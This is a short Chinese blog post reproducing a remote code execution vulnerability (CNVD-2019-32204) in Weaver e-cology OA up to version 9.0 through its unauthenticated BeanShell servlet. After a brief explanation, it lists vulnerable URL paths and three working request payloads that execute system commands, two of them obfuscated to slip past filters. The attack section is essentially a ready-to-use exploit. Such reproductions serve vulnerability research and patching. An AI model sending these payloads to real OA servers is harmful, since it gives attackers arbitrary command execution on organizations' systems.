泛微e-cology OA 远程代码执行漏洞

0x00 漏洞原理

该漏洞位于 e-cology OA系统BeanShell组件中,并且该组件允许未授权访问,攻击者可通过访问该组件执行任意的Java代码,导致远程命令执行。

0x01影响版本

泛微 e-cology<=9.0

0x02复现

可能的路径

/weaver/bsh.servlet.BshServlet
/weaveroa/bsh.servlet.BshServlet
/oa/bsh.servlet.BshServlet

payload:

bsh.script=exec("whoami");&bsh.servlet.output=raw
bsh.script=\u0065\u0078\u0065\u0063("whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\\"command\\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami
image.png
image.png

0x03参考

https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 泛微OA WorkflowCenterTreeData接口注入漏洞复现
    0x01 前言 来源:个人博客 在CNVD上刚发现泛微OA的新漏洞,就有大佬发出漏洞细节,就进行了复现。 0x02...
    dylan903阅读 1,597评论 0 0
  • 听说三本的都要准备去考研了
    你是12年入学,15年高考的人吗? 是也好,不是也好,这中间的过程,仿佛都经历了1314(一生一世)。 你还记得嘛...
    南风z阅读 368评论 2 6
  • 北回归线之间
    我能听到炙热的微风吹拂的声响, 我能看见在蓝天轻抚下扮着小丑恣意妄为着的浮云。 我能窥见独月,洒下的一束清冷之光。...
    世荒芜阅读 278评论 0 1
  • 从来就没有真正的绝境
    智利北部有一个叫丘恩贡果的小村子,这里西临太平洋,北靠阿塔卡玛沙漠。特殊的地理环境,使太平洋冷湿气流与沙漠上...
    建行杨勇阅读 198评论 0 0
  • 改善体质
    食物是影响健康最大的因素,好的食物构筑健康的身体,错误的食物带来衰老和疾病。 什么是好的食物,最适合人体的食物。 ...
    张春华阅读 253评论 0 0